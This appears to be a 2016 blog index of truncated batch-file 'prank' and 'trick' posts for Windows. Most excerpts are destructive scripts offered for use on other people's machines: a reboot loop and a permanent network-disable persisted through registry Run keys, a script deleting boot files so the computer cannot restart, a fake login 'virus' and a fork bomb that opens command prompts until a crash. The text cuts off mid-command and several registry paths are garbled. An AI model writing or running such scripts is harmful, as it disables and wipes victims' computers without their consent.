Sunday, 27 November 2016

Crash

System Meltdown :CRASH net send * WORKGROUP ENABLED net send * WORKGROUP ENABLED GOTO CRASH ipconfig /release shutdown -r -f -t0 echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv...

Disable Internet

Disable internet permanently echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve...

Cmd Calculator

 @echo off title Calc :loop cls set /p first=First number:  echo. echo Mark ( + - * / ) set /p mark=Mark:  echo. set /p second=Second number:  set /a final=%first%%mark%%second% echo. echo %final% pause goto loop Save it as learnfromzero.ba...

Shutdown your computer forever

!!! WARNING !!! It shuts the computer off once, and deletes the files needed to reboot and restart !!! @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini  Save it as Learnfromzero.bat REMEMBER -...

Start website

Description: This will allow you to start any program just by opening this file including the task manager.  1. Go into Notepad and type:  start "www.examplewebsite.com" (without quotes and with a real domain name.) 2. Save it as start.bat  3. Test it out to see if it gets you to the website...

Fake Area

Description: Shows a fake username and password entrance area then deletes it self.  1. Go into notepad and type:  @echo off  echo If the proper username and password is not entered all files will be deleted by this virus.  echo Good Luck  set/p\/name=username:  set/p\/password=password:  echo haha you got the...

Shut Down

Description: This makes your friend think that his/her computer has a virus then their computer shuts down.  1. Go to notepad and type:  @echo off  :A  cls  echo Do you wanna crash your computer? (y/n)  pause  echo Are you sure? (y/n)  pause  echo your computer will crash when the time reaches zero.  pause  msg...

Command prompts unlimited

This prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it.  1. Go into Notepad  2. Type start virus.bat  3. Save it as virus.bat 4. Test it if you want. ;)                (This program can't damage your...

Delete

This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.  @echo off  echo do you want to delete all of your computer data? (y/n)  pause >nul echo Do not exit out of the screen or all computer data will be deleted.  ping localhost...